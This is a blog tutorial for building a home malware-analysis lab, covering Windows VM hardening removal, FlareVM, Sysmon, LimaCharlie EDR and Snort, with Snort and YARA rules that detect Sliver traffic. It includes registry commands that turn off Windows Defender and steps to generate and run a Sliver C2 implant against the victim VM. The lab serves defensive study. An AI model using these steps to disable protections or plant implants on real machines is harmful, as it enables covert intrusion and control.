What is Needed

• VMWare Workstation
• Windows 10 VM
• Ubuntu Server 22

Install Ubuntu

Use the ISO and make it at least 14GB disk, 2 CPU, 2GB RAM. Disable updates. Now we will make the IP of the VM static. Go on with the installation until the “Network connections” step.

img1

1. In VMWorkstation, go to “Edit” > “Virtual Network Editor” > Select the one with type “Type: Nat” > “NAT Settings”. Write down “Gateway IP” and “Subnet IP”, in my case they are 192.168.192.2 and 192.168.192.0 respectively.
2. In the Ubuntu installation select the first line of the configuration (you’ll probly have something like “eth” something, check img2). Go to “Edit IPv3” > “Manual” > Write down the IPs you saw before. Add “/24” at the end of the subnet, give your assigned IP (I put 192.168.192.137) and give a valid DNS server for the “Name servers” field. You can use Google’s one, 8.8.8.8. You can leave empty the other field

img2

You can go on with the installation. No need to get fancy, keep the defaults. Install OpenSSH and we are done

Install Windows

Follow the installation process and keep defaults. After you have everything ready you can move to disable the Windows Defender Antivirus and install other useful tools.

Disable Defenses

If you want to learn what a malicious software is doing in all of its potential, the best way is not trying to stop it in any way. For this reason we want to disable all the defenses that are shipped by default with Windows

1. Use the Group Policy Editor to disable Windows Defender: Start > Search for “Group Policy” > Local Computer Policy > Administrative Templates > Windows Components > Windows Defender > Turn off Windows Defender > “Enable”
2. To be sure, permanently disable defender by adding a registry key

REG ADD "hklm\software\policies\microsoft\windows defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

3. Again with the Group Policy Editor go to: Computer Configuration > Administrative Templates > Windows Components > Windows Security > Notifications > Hide all notifications > “Enable”
4. Use safe mode to complete the settings: Start > type “msconfig” > “Boot” tab > Boot Options > Check Safe boot > Minimal > Apply and Ok > Now you can reboot. From the rebooted system: Start > type “regedit” > Now you need to change the “start” value (that you will find on the right side) for each of the following keys with 4. After that go again in the Boot options and uncheck Safe boot.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter

imgRegistry

Install FlareVM

FlareVM is a suite of tools and config create mandiant in order to help analyst with their job. Installing it will give you various tools to better explore the system and all the bad things that will happen in it

1. Download the installer from here
2. Unblock it and enable execution with

Unblock-File .\install.ps1
Set-ExecutionPolicy Unrestricted -Force 

3. Launch it

.\install.ps1

You will be asked to make some choice, you can personalize the installation as you see fit. When in doubt kepp the default

imgGUIFlare

Other Useful Tools

In addition to what is already present in FlareVM~~ we want to install sysmon. Download it and unzip it:

iwr -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile C:\Windows\Temp\Sysmon.zip
Expand-Archive -LiteralPath C:\Windows\Temp\Sysmon.zip -DestinationPath C:\Windows\Temp\Sysmon

We will use the SwiftOnSecurity Configs:

iwr -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile C:\Windows\Temp\Sysmon\sysmonconfig.xml

Now we can install.

C:\Windows\Temp\Sysmon\Sysmon64.exe -accepteula -i C:\Windows\Temp\Sysmon\sysmonconfig.xml

To check if everything has been installed correctly, check that the service is installed and that it’s capturing events

Get-Service sysmon64
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10

After the first command you should see the service running and after the second you should see the captured events

Install an EDR

What we want to do with this machines is not only the study of threats but also we want to be able to catch and limit their actions like we are SoC analysts in a real company. For this reason we want to install an EDR (in our case LimaCharlie) and an IDS/IPS (in our case Snort) to explore the use of products and rules used to limit the action of malwares.

LimaCharlie

1. Register on the website
2. After having created you account, create an organization and use as template “Extended Detection & Response Standard”
3. Click on “Add a Sensor”, Create a key, and associate the 2~~. You want an x86-64(.exe) sensor
4. Follow the instruction in the Windows VM. If you did the previous steps not in the VM, to get the installer directly in the Windows machine you can obtain it with

iwr -Uri https://downloads.limacharlie.io/sensor/windows/64 -Outfile C:\Users\User\Downloads\lc_sensor.exe

5. Check if the service is registred and finish
6. From the LimaCharlie GUI, go to: Artifact Collection > Artifact Collection Rules > Add Rule and use:

Name: windows-sysmon-logs Platforms: Windows Path Pattern: wel://Microsoft-Windows-Sysmon/Operational:* Retention Period: 10

7. Save

Snort

1. Get Snort and WinPcap

iwr -Uri https://github.com/snort3/snort3/archive/refs/tags/3.1.78.0.tar.gz -Outfile C:\Users\User\Downloads\snort.tar.gz
Expand-Archive -LiteralPath C:\Users\User\Downloads\snort.zip -DestinationPath C:\Users\User\Downloads\snort

2. Get Rules
3. Fix config: invert the paths “/” (make them “"), put your IP in the right spot, and comment this line:

decompress_swf { deflate lzma } \

https://raw.githubusercontent.com/thereisnotime/Snort-Default-Windows-Configuration/master/snort.conf

Attacker

Our attacker will be the Ubuntu machine. SSH in it and get root (use your IP and user):

ssh mat@1.1.1.1
sudo su

We will install a C2 to test our malicious intention. We will use Sliver, you can get it with:

wget https://github.com/BishopFox/sliver/releases/download/v1.5.34/sliver-server_linux -O /usr/local/bin/sliver-server
chmod +x /usr/local/bin/sliver-server

We can now create the C2 server (use your user and IP). We will create a folder first:

mkdir /opt/sliver
cd /opt/sliver
sliver-server
generate --http mat@1.1.1.1 --save /opt/sliver

Your implant will have been given a name (mine is called X). Keep in mind that yours will be different. Now we want to move the implant to the victim VM.

You can close the SSH connection and start the sliver listner.

sliver-server
http

Move to the Windows victim VM and start the infection by starting the just downloaded exe.

Return to the Linux attacker and check the opened session (might take some time). Write down the ID and connect to it. I’ll use my ID yours will be different.

use X

Now you are in and the C2 is installed

Doing some Analysis

In this section I briefly show how the lab can be operated. Examples are very simple and can be used to verify everything is working correctly and that you are familiar with the tools.

Snort

1. Quick test

snort -i -c C:\Snort\etc\snort.conf -T

2. Start Capture

snort -i -c C:\Snort\etc\snort.conf -A console

3. Get Rule

alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Session Message Detected"; flow:to_server,established; content:"POST"; http_method; pcre:"/\/(?:php|api|upload|actions|rest|v1|auth|authenticate|oauth|oauth2|oauth2callback|database|db|namespaces\/)?(login|signin|api|samples|rpc|index|admin|register|sign-up)\.php\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000002; rev:1;)
alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Poll Detected"; flow:to_server,established; content:"GET"; http_method; pcre:"/\/(?:js|umd|assets|bundle|bundles|scripts|script|javascripts|javascript|jscript\/)?(bootstrap|bootstrap.min|jquery.min|jquery|route|app|app.min|array|backbone|script|email)\.js\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000003; rev:1;)
alert tcp any any -> any $HTTP_PORTS (msg:"Sliver C2 Close File Detected"; flow:to_server,established; content:"GET"; http_method; pcre:"/\/(?:static|www|assets|images|icons|image|icon|png\/)?(favicon|sample|example)\.png\?[a-zA-Z]=/U"; pcre: "/(PHPSESSID|SID|SSID|APISID|csrf-state|AWSALBCORS)/C"; classtype:trojan-activity; sid:1000004; rev:1;)                                                                                                                                                                                                                                                     

Thanks to ImmersiveLabsSec for the rules.

4. Capture Rule

Now you can run snort and operate Sliver. You will get hits for the opening closing of the connection and some other operational network exchanges.

LimaCharlie & YARA

With LimaCharlie you can check a lot of things. Explore the WebGUI and see if you can find IOCs (try to look among the connections ;)).

One specific thing I wanted to explore with LimaCharlie is the use of YARA rules: go to Automation > YARA Rules > Add Yara Rule. You can name it however you want. We want to identify sliver, so we will use this rule. Just copy paste it and save.

Now we want to activate it. Go to Automation > D&R Rules > New Rule. In the Detect block put:

event: YARA_DETECTION
op: and
rules:
  - not: true
    op: exists
    path: event/PROCESS/*
  - op: exists
    path: event/RULE_NAME

In the Respond block put:

- action: report
  name: YARA Detection {{ .event.RULE_NAME }}
- action: add tag
  tag: yara_detection
  ttl: 80000

Name it and save it.

To test it, go to Sensors > Sensors List > select our sensor > Console. Insert the command (use your payload name):

yara_scan hive://yara/sliver -f C:\Users\User\Downloads\[payload_name].exe

You should now see that the sliver payload has been identified!

Conclusion

This blog post has been made to give you a fast way to setup a lab for blue team analysis. The examples given are very simple, if you want to explore more I cannot stress enough how good is the So you want to be a SOC analyst? by ecapuano. He is way (way way way) more knowledgable than me, the info you find in this post have been inspired and checked with the content you’ll find in its serie. He also recently updated the course so you might want to check that out too!